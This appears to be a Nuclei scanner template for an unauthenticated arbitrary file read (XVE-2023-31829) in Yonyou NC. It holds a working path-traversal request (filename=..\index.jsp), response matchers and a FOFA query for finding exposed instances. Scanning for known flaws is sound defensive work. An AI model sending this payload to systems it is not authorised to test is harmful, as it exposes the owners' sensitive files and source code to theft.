http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - request.getSession(true)
            - response.addHeader("Cache-Control", "no-store")
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /portal/pt/xml/file/download?pageId=login&filename=..\index.jsp HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
          Content-Type: application/x-www-form-urlencoded
id: yongyouNC-download-File-reading-XVE-2023-31829
info:
    author: Superhero
    description: |-
        fofa: app="用友-UFIDA-NC"
        用友NC printBill 接口处存在任意文件读取，未经身份验证的远程攻击者可利用该漏洞读取系统敏感文件。使系统处于极不安全的状态。
    name: 用友NC download 任意文件读取(XVE-2023-31829)
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488084&idx=1&sn=72f941bb5d5d582e1a7f4c057bb27d9e&chksm=c267a767f5102e71dfe35093db374478d19ef696fa71ac5a48bf1c3e5bba15dc6833c261e830&token=1431500657&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
        - 用友-ufida
